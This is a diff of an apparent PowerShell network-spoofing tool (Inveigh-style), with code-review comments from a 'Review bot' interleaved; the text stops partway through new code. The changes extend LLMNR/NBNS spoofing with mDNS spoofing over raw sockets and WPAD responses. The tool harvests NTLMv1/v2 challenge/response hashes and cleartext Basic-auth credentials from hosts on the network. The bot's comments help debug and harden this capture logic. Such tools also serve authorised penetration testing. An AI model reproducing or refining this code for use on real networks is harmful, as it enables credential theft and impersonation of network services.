- $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
- $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")])
-
- if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)}))
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")])
- }
-
- }
-
+ $HTTP_client_close = $false
}
if($TCP_request -like "50-4f-53-54*")
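Review bot: the Host and User-Agent extraction (and the "ignoring wpad.dat request due to user agent" log entry) is deleted here with no replacement in this hunk, yet `$HTTP_header_user_agent` is still consulted later in this scriptblock by the `$WPADAuthIgnore` and `$ProxyIgnore` checks. Confirm the parsing was moved ahead of this point for every request path, otherwise those checks run against a stale value from the previous request on the same connection (or `$null` on the first one). Also note that `$HTTP_client_close = $false` is now set unconditionally here while the same reset is removed from the NTLM type 1 branch below; a one-line comment saying the flag is initialised per request would make the intent clear.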
@@ -1601,11 +1751,16 @@ $HTTP_scriptblock =
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP")
$inveigh.POST_request_file_queue.Add($HTTP_POST_request)
$inveigh.POST_request_list.Add($HTTP_POST_request)
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")])
if($inveigh.file_output)
{
$inveigh.console_queue.Add("$HTTP_type POST request written to " + $inveigh.POST_request_out_file)
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")
}
}
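Review bot: `$inveigh.POST_request_file_queue.Add($HTTP_POST_request)` stays unconditional while the matching log entry is now gated on `$inveigh.file_output`. If the file queue is only drained when file output is enabled, every captured POST body accumulates in memory for the life of the run; gate the queue add on the same flag, e.g. move it inside `if($inveigh.file_output)` next to the `log_file_queue.Add`.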
@@ -1617,26 +1772,13 @@ $HTTP_scriptblock =
{
$HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
[Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
-
- if($proxy_listener)
- {
- $HTTP_response_status_code = 0x34,0x30,0x37
- $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
- }
- else
- {
- $HTTP_response_status_code = 0x34,0x30,0x31
- $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
- }
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
$NTLM = NTLMChallengeBase64 $Challenge $HTTPNTLMESS $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
- $HTTP_client_close = $false
}
elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
{
- $NTLM = "NTLM"
$HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
$HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
$HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
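Review bot: the removed `$proxy_listener` branch was the only visible place that selected 407/`Proxy-Authenticate:` versus 401/`WWW-Authenticate:` for the NTLM type 1 reply, and nothing in this hunk replaces it; confirm `$HTTP_response_status_code` and `$HTTP_header_authenticate` are now assigned before this point for both listener types, or the challenge goes out with whatever the previous request left in them. Dropping `$NTLM = "NTLM"` from the type 3 branch has the same flavour: `$NTLM` keeps the last base64 challenge until the next type 1 arrives, so it should be reset wherever the per-request state is initialised.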
@@ -1668,17 +1810,26 @@ $HTTP_scriptblock =
$HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
- {
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
+ {
$inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
+ }
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
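Review bot: the log text changes from `$HTTP_source_IP ($HTTP_NTLM_host_string)` to `$HTTP_source_IP($HTTP_NTLM_host_string)` (space dropped) in the file, in-memory and console entries; anything that splits the line on whitespace to pull out the source address will now receive `10.0.0.5(HOST)`. Keep the space unless the format change is deliberate, and build the message once (`$HTTP_NTLM_log_entry = "..."`) and reuse it in the `file_output`, `log_output` and console branches instead of repeating the string three times.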
@@ -1703,16 +1854,25 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
$inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
+ }
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
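Review bot: this NTLMv2 block is now a near-verbatim copy of the NTLMv1 block above (same `file_output`/`log_output`/`console_unique` branching, same message text), differing only in the version label and the list names. A small helper taking the version string and the target list would collapse both to a few lines and stop the two paths from drifting, which has already started: the "not unique" console line here and in the v1 block moved the user name onto a second line, while the `file_unique` check kept the old shape.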
@@ -1737,7 +1897,6 @@ $HTTP_scriptblock =
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
- $NTLM_auth = $true
$HTTP_client_close = $true
$NTLM_challenge = ""
@@ -1750,7 +1909,7 @@ $HTTP_scriptblock =
}
else
{
- $HTTP_client.Client.Close()
+ $HTTP_send = $false
}
}
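Review bot: replacing `$HTTP_client.Client.Close()` with `$HTTP_send = $false` means the socket now stays open after a failed NTLM type 3 exchange, so the close must happen on the common path instead; confirm it does. More importantly, `$HTTP_send` has to be reset to `$true` at the top of each request iteration (not visible in this diff), otherwise once it is cleared every later response on that listener is silently suppressed by the `if($HTTP_send)` guard added further down.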
@@ -1758,8 +1917,7 @@ $HTTP_scriptblock =
}
else
{
- $NTLM = "NTLM"
- $HTTP_client_close = $false
+ $HTTP_client_close = $true
}
}
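Review bot: this else branch flips `$HTTP_client_close` from `$false` to `$true` and also drops the `$NTLM = "NTLM"` reset. Since the response builder below only emits the NTLM `WWW-Authenticate` data when `!$HTTP_client_close`, a request that lands here will no longer receive a challenge header; if that is intended (close without re-challenging), say so in a comment, because the old code did the opposite. The dropped reset also leaves `$NTLM` holding the previous challenge blob, so reinitialise it with the other per-request state.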
@@ -1770,7 +1928,6 @@ $HTTP_scriptblock =
$HTTP_header_authorization = $HTTP_header_authorization -replace 'Basic ',''
$cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($HTTP_header_authorization))
$HTTP_client_close = $true
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")])
$inveigh.cleartext_file_queue.Add($cleartext_credentials)
$inveigh.cleartext_list.Add($cleartext_credentials)
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP")
@@ -1778,24 +1935,18 @@ $HTTP_scriptblock =
if($inveigh.file_output)
{
$inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")
}
-
- }
- else
- {
- if($HTTPAuth -ne 'Anonymous' -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -ne 'Anonymous'))
+ if($inveigh.log_output)
{
- $HTTP_client_close = $false
- }
- else
- {
- $HTTP_client_close = $true
+ $inveigh.log.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")
}
-
+
}
- if(($HTTPAuth -eq 'Anonymous' -and $HTTP_request_raw_url -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $HTTP_request_raw_url -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth)
+ if(($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
+ $WPADAuthIgnore.Count -gt 0 -and $WPADAuth -like 'NTLM*' -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})) -or $HTTP_client_close)
{
if($HTTPDir -and $HTTPDefaultEXE -and $HTTP_request_raw_url -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)))
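Review bot: `$WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_}` treats every `WPADAuthIgnore` entry as a case-insensitive regular expression, so a value containing `(`, `.`, `+` or `|` (common in user-agent strings) is interpreted as a pattern rather than text; either document the parameter as a regex list or use `$HTTP_header_user_agent -match [regex]::Escape($_)` for literal matching. Also, the condition now relies on `$HTTP_header_user_agent` being populated for this request (its extraction was removed from this scriptblock earlier in the patch), and mixes `$HTTP_request_raw_url` and `$HTTP_request_raw_URL` on the same line; harmless in PowerShell, but pick one spelling.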
@@ -1837,7 +1988,7 @@ $HTTP_scriptblock =
else
{
- if($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)})))
+ if($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
{
$HTTP_message = $WPADResponse
$HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
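Review bot: switching `$HTTP_header_user_agent.contains($_)` to `$HTTP_header_user_agent -match $_` changes `ProxyIgnore` from a case-sensitive literal substring test to a case-insensitive regex, and also stops throwing when `$HTTP_header_user_agent` is `$null` (`.contains` on `$null` fails, `-match` just returns `$false`). The second effect is an improvement; the first needs either a note in the parameter help or `[regex]::Escape($_)` so existing `ProxyIgnore` values with regex metacharacters keep their meaning.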
@@ -1866,18 +2017,14 @@ $HTTP_scriptblock =
$HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
$HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message_bytes.Length)
- if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth)
- {
+ if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close)
+ {
$HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
}
elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat'))
{
$HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm")
}
- else
- {
- $HTTP_response_status_code = 0x32,0x30,0x30
- }
$packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
$packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
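Review bot: operator precedence makes the new `!$HTTP_client_close` guard apply only to the WPAD half of the condition. PowerShell binds `-and` tighter than `-or`, so `(A) -or (B) -and !$HTTP_client_close` parses as `A -or (B -and !$HTTP_client_close)`; for a non-WPAD URL with `HTTPAuth` set to NTLM the NTLM `WWW-Authenticate` data is attached even when the connection is flagged for close. The old line had the same shape with `!$NTLM_auth`, so the bug is inherited, but since the line is being rewritten wrap the whole `-or` expression: `if((($HTTPAuth -like 'NTLM*' -and ...) -or ($WPADAuth -like 'NTLM*' -and ...)) -and !$HTTP_client_close)`. Removing the `else { $HTTP_response_status_code = 0x32,0x30,0x30 }` fallback also means the anonymous path depends on the status code having been set earlier; confirm that.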
@@ -1902,10 +2049,14 @@ $HTTP_scriptblock =
$packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
}
- $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
- $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
- $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
- $HTTP_stream.Flush()
+ if($HTTP_send)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
+ $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
+ $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
+ $HTTP_stream.Flush()
+ }
+
Start-Sleep -m 10
$HTTP_request_raw_URL_old = $HTTP_request_raw_URL
$HTTP_client_handle_old = $HTTP_client.Client.Handle
@@ -1935,7 +2086,7 @@ $HTTP_scriptblock =
$HTTP_client.Close()
start-sleep -s 1
- $HTTP_listener.Server.blocking = $false
+ $HTTP_listener.Server.Blocking = $false
Start-Sleep -s 1
$HTTP_listener.Server.Close()
Start-Sleep -s 1
@@ -1945,8 +2096,8 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
- param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,
- $SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval,$RunTime,$LLMNRTTL,$NBNSTTL)
+ param ($IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,$mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,$SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,
+ $SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval)
$sniffer_running = $true
$byte_in = New-Object System.Byte[] 4
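Review bot: `$RunTime` is removed from the sniffer `param` list and the remaining parameters are reordered alphabetically while `$mDNS`, `$mDNS_response_message`, `$mDNSTypes` and `$mDNSTTL` are inserted. Any `$RunTime` reference left inside the scriptblock now evaluates to `$null`, and every invocation that passes arguments positionally must be updated to the new order; passing them by name would make the reorder safe. A short comment listing the new mDNS parameters next to the `param` line would also help, as the header comment still says "LLMNR/NBNS Spoofer".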
@@ -1968,14 +2119,26 @@ $sniffer_scriptblock =
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")])
$sniffer_running = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
+ }
+
}
$inveigh.sniffer_socket.Bind($end_point)
$inveigh.sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out)
$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
[Array]::Reverse($LLMNR_TTL_bytes)
+ $mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL)
+ [Array]::Reverse($mDNS_TTL_bytes)
$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
[Array]::Reverse($NBNS_TTL_bytes)
$LLMNR_learning_log = New-Object System.Collections.Generic.List[string]
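Review bot: the catch block records the error and sets `$sniffer_running = $false`, but execution then continues straight into `$inveigh.sniffer_socket.Bind($end_point)` and the `IOControl` call, which throw against a socket that was never created and mask the original message. Return from the scriptblock (or guard the Bind with `if($sniffer_running)`) right after the new logging so the "Error starting sniffer/spoofer" entry is the last thing the operator sees. The mDNS TTL handling mirrors LLMNR/NBNS correctly; `[System.BitConverter]::GetBytes` needs `$mDNSTTL` to arrive as an `[Int32]`, so keep the parameter typed at the caller.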
@@ -2013,7 +2176,7 @@ $sniffer_scriptblock =
$destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
$binary_reader.ReadBytes(16)
$TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4
- $binary_reader.ReadByte(7)
+ $binary_reader.ReadBytes(7)
$payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length))
switch ($destination_port)
@@ -2238,7 +2401,17 @@ $sniffer_scriptblock =
$NBNS_UDP_client.Close()
$NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_transaction_ID $NBNS_query_string")
$inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
+ }
+
}
}
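Review bot: the message text in this NBNS learning branch still says "LLMNR request for $NBNS_query_string sent to ..." in both the `log_file_queue` and `log` entries, while the console entry two lines above correctly says "NBNS request". The copy-paste error existed in the removed line and is carried into both new lines; change both to `NBNS request for $NBNS_query_string sent to`, or better, assign the string to one variable and reuse it for console, file and log so the three cannot disagree.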
@@ -2324,7 +2497,17 @@ $sniffer_scriptblock =
if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00')
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
+ }
+
}
elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
@@ -2336,10 +2519,191 @@ $sniffer_scriptblock =
{
$inveigh.valid_host_list.Add($NBNS_query_string)
$inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+
+ 5353 # mDNS
+ {
+
+ if([System.BitConverter]::ToString($payload_bytes) -like '*-00-01-80-01')
+ {
+ $UDP_length[0] += 10
+ $mDNS_query_payload_bytes = $payload_bytes[(12)..($payload_bytes.Length - 5)]
+ $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
+ $mDNS_query_string_full = $mDNS_query_string + ".local"
+
+ $mDNS_response_data = $mDNS_query_payload_bytes +
+ 0x00,0x01,0x00,0x01 +
+ $mDNS_TTL_bytes +
+ 0x00,0x04 +
+ ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+
+ $mDNS_response_packet = 0x14,0xe9 +
+ $source_port[1,0] +
+ $UDP_length[1,0] +
+ 0x00,0x00 +
+ $payload_bytes[0,1] +
+ 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 +
+ $mDNS_response_data
+
+ if($mDNS -eq 'Y')
+ {
+
+ if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (
+ !$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
+ $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QU'))
+ {
+ $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
+ $send_socket.SendBufferSize = 1024
+ $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
+ $send_socket.SendTo($mDNS_response_packet,$destination_point)
+ $send_socket.Close()
+ $mDNS_response_message = "- response sent"
+ }
+ else
+ {
+
+ if($mDNSTypes -notcontains 'QU')
+ {
+ $mDNS_response_message = "- disabled mDNS type"
+ }
+ elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
+ {
+ $mDNS_response_message = "- $mDNS_query_string is not on reply list"
+ }
+ elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
+ {
+ $mDNS_response_message = "- $mDNS_query_string is on ignore list"
+ }
+ elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ {
+ $mDNS_response_message = "- $source_IP is not on reply list"
+ }
+ elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+ {
+ $mDNS_response_message = "- $source_IP is on ignore list"
+ }
+ else
+ {
+ $mDNS_response_message = "- not spoofed due to previous capture"
+ }
+
+ }
+
+ }
+
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($payload_bytes) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*')
+ {
+ $UDP_length[0] += 4
+ $mDNS_query_payload_bytes = $payload_bytes[12..($payload_bytes[12] + 12)]
+ $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
+ $mDNS_query_string_full = $mDNS_query_string + ".local"
+
+ $mDNS_response_data = $mDNS_query_payload_bytes +
+ 0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 +
+ 0x00,0x01,0x80,0x01 +
+ $mDNS_TTL_bytes +
+ 0x00,0x04 +
+ ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+
+
+ $mDNS_response_packet = 0x14,0xe9 +
+ $source_port[1,0] +
+ $UDP_length[1,0] +
